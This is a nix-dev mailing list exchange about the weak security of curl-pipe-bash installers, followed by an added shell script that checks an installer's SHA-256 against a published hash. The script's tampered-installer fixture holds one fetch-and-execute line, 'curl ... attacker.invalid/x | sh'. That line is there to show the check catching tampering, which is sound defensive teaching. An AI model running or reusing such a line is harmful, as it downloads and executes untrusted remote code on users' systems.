[Nix-dev] Malicious installation methods

Adrien Devresse Adev at adev.name
Fri Jun 17 15:56:22 CEST 2016


> So you're trusting a hash from the same site that you are downloading
> the script from? I can see a lot of value in a cryptographic signature
> (like PGP) but I see almost no value in a hash.
>
Briefly, yes.

This is already a security improvement.

As already said before, detecting whether a user runs a curl-pipe-bash and
injecting a malicious binary on the fly is rather trivial to do compared
to compromising the nixos website itself and creating a phishing site that fakes
both the tarball and the displayed hash.

However, I entirely agree with you that a cryptographic signature would
be the best way to go.

Cheers,
Adev


On 17/06/2016 15:23, Kevin Cox wrote:
> On 17/06/16 09:17, Adrien Devresse wrote:
>>> The installer, when run, will fetch more code for users to blindly execute (as most of that code will be provided in compiled form). How is blindly running an installer worse than running other code from the same provider?
>> Simply put the shasum of your installer on the website and ask the user
>> to verify. That is what many projects do, and it's three lines of
>> installation instead of one.
>>
> So you're trusting a hash from the same site that you are downloading
> the script from? I can see a lot of value in a cryptographic signature
> (like PGP) but I see almost no value in a hash.
>
>
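
The "three lines of installation" Adev describes, written out as an added example (this is not code from the thread and not the Nix project's own installer): download the installer, compare its SHA-256 against the digest published on the website, and only then execute it. The download and the published hash are stand-ins constructed locally so the script runs offline; the "tampered" file models the on-the-fly injection into curl | bash that the hash check is meant to catch. The hash values and file contents below are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the nix-dev thread: refuse to run an installer
# whose SHA-256 does not match the digest published alongside it.
set -eu

# Hex SHA-256 of a file. Uses coreutils sha256sum, falling back to perl shasum.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# verify_installer FILE EXPECTED_HEX
# Returns 0 when FILE exists and its digest equals EXPECTED_HEX, 1 otherwise.
# The comparison is case-insensitive so a digest copied from a web page in
# upper case still matches.
verify_installer() {
  if [ ! -f "$1" ]; then
    printf 'missing file: %s\n' "$1" >&2
    return 1
  fi
  actual=$(sha256_of "$1")
  expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  printf 'hash mismatch for %s\n  expected %s\n  got      %s\n' "$1" "$expected" "$actual" >&2
  return 1
}

# install_if_verified FILE EXPECTED_HEX: the replacement for `curl ... | sh`.
# The installer is only handed to the shell after the digest check passes.
install_if_verified() {
  verify_installer "$1" "$2" || return 1
  sh "$1"
}

# --- Constructed inputs standing in for the download and the published hash ---
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# The installer as the website actually serves it (constructed).
printf '#!/bin/sh\necho "installing nix"\n' > "$WORK/install"
# The digest a user would read off the website; here derived from the file above.
PUBLISHED_HASH=$(sha256_of "$WORK/install")
# The same installer after an on-path attacker appends a stage-two fetch
# (constructed; attacker.invalid is a reserved, non-resolving name).
printf '#!/bin/sh\necho "installing nix"\ncurl -s http://attacker.invalid/x | sh\n' \
  > "$WORK/install.mitm"

echo "--- installer as published:"
if install_if_verified "$WORK/install" "$PUBLISHED_HASH"; then
  echo "ok: digest matched, installer ran"
fi
echo "--- installer as rewritten in transit:"
if install_if_verified "$WORK/install.mitm" "$PUBLISHED_HASH"; then
  echo "BUG: tampered installer ran"
else
  echo "ok: digest mismatch, refused to run"
fi
```

This is exactly the check Kevin Cox objects to: if the attacker can rewrite the site itself, the published digest is rewritten too and the check passes. What it does defeat is the cheaper attack Adev describes, where only the response to the curl request is altered. The signature Adev agrees is the better option would replace the string comparison with a `gpg --verify` of a detached signature against a key obtained from somewhere other than the download site.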

